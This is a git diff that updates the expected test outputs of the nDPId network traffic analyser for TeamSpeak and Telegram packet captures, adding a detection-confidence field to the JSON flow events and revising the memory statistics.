+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946745680740,"flow_last_seen":946745717746,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":946745717746,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 13/13
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595206 bytes
-~~ total memory freed........: 4595206 bytes
-~~ total allocations/frees...: 99566/99566
+~~ total memory allocated....: 4680159 bytes
+~~ total memory freed........: 4680159 bytes
+~~ total allocations/frees...: 101156/101156
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 688 chars
-~~ json string avg len.......: 490 chars
+~~ json string avg len.......: 491 chars
diff --git a/test/results/telegram.pcap.out b/test/results/telegram.pcap.out
index 7a8a98bd2..bc50c95f7 100644
--- a/test/results/telegram.pcap.out
+++ b/test/results/telegram.pcap.out
@@ -1,101 +1,101 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"telegram.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00814{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588779596451,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"ts_msec":1588779596451,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJVAAEARYHzAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGANsCwWgAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
+00711{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1588779596464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1588779596464,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACavyQAAAERSFfAqAE17\/\/\/+tQiB2wAhkPyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1588779596464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1588779596464,"pkt":"AQBeAAD7wJrQLWJ0CABFAABJuJEAAAERXjrAqAE14AAA+xTpFOkANQuaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
+00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1588779596465,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"ts_msec":1588779596465,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTehJAAAERW5\/AqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="}
-00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
+00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1588779596708,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1588779596708,"pkt":"AQBeAAD7jP5XIzfkCABFAACAA9gAAP8RFKbAqAFL4AAA+xTpFOkAbODJAACEAAAAAAEAAAABBV9kYWNwBF90Y3AFbG9jYWwAAAwAAQAAAAAAHxxpVHVuZXNfQ3RybF80QUJCMzlBNDFFRUZERUIzwAwAACkFoAAAEZQAEgAEAA4A2a7+VyM35Iz+VyM35A=="}
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}}
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1588779596708,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"ts_msec":1588779596708,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfAGwR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsHDYAAIQAAAAAAQAAAAEFX2RhY3AEX3RjcAVsb2NhbAAADAABAAAAAAAfHGlUdW5lc19DdHJsXzRBQkIzOUE0MUVFRkRFQjPADAAAKQWgAAARlAASAAQADgDZrv5XIzfkjP5XIzfk"}
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}}
+00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}}
 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1588779597257,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1588779597257,"pkt":"AQBeAAD7jP5XIzfkCABFAADbeQgAAP8RnxrAqAFL4AAA+xTpFOkAx\/OHAAAAAAAFAAAAAQABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEIX2FpcnBsYXnAHAAMgAEFX3Jhb3DAHAAMgAEcaVR1bmVzX0N0cmxfNEFCQjM5QTQxRUVGREVCMwVfZGFjcMAcAP+AAcBWACEAAQAAAHgAFwAAAADHIw5HYWJyaWVsZXMtaVBhZMAhAAApBaAAABGUABIABAAOANqu\/lcjN+SM\/lcjN+Q="}
 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1588779597258,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":253,"pkt_l4_len":199,"ts_msec":1588779597258,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfAMcR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QDHLvQAAAAAAAUAAAABAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQhfYWlycGxhecAcAAyAAQVfcmFvcMAcAAyAARxpVHVuZXNfQ3RybF80QUJCMzlBNDFFRUZERUIzBV9kYWNwwBwA\/4ABwFYAIQABAAAAeAAXAAAAAMcjDkdhYnJpZWxlcy1pUGFkwCEAACkFoAAAEZQAEgAEAA4A2q7+VyM35Iz+VyM35A=="}
 00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1588779597258,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":308,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":308,"pkt_l4_len":274,"ts_msec":1588779597258,"pkt":"AQBeAAD7jP5XIzfkCABFAAEmpacAAP8RcjDAqAFL4AAA+xTpFOkBEl+aAACEAAAAAAMAAAADCV9zZXJ2aWNlcwdfZG5zLXNkBF91ZHAFbG9jYWwAAAwAAQAAEZQADQVfZGFjcARfdGNwwCMBOAExATMBRQE3ATEBOAE3AUEBMQE5ATABQQFCATQBMAEwATABMAEwATABMAEwATABMAEwATABMAEwATgBRQFGA2lwNgRhcnBhAAAMgAEAAAB4ABEOR2FicmllbGVzLWlQYWTAIwI3NQExAzE2OAMxOTIHaW4tYWRkcsCFAAyAAQAAAHgAAsCVwEEAL4ABAAAAeAAGwEEAAgAIwKYAL4ABAAAAeAAGwKYAAgAIAAApBaAAABGUABIABAAOANqu\/lcjN+SM\/lcjN+Q="}
 00817{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1588779597258,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":328,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":328,"pkt_l4_len":274,"ts_msec":1588779597258,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfARIR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QESmwYAAIQAAAAAAwAAAAMJX3NlcnZpY2VzB19kbnMtc2QEX3VkcAVsb2NhbAAADAABAAARlAANBV9kYWNwBF90Y3DAIwE4ATEBMwFFATcBMQE4ATcBQQExATkBMAFBAUIBNAEwATABMAEwATABMAEwATABMAEwATABMAEwATABOAFFAUYDaXA2BGFycGEAAAyAAQAAAHgAEQ5HYWJyaWVsZXMtaVBhZMAjAjc1ATEDMTY4AzE5Mgdpbi1hZGRywIUADIABAAAAeAACwJXAQQAvgAEAAAB4AAbAQQACAAjApgAvgAEAAAB4AAbApgACAAgAACkFoAAAEZQAEgAEAA4A2q7+VyM35Iz+VyM35A=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1588779597291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"ts_msec":1588779597291,"pkt":"jP5XIzfkKDc3AG3ICABFAAEy\/KUAAP8ROizAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="}
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1588779598465,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1588779598465,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACa8TAAAAERFkvAqAE17\/\/\/+tQiB2wAhkPyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
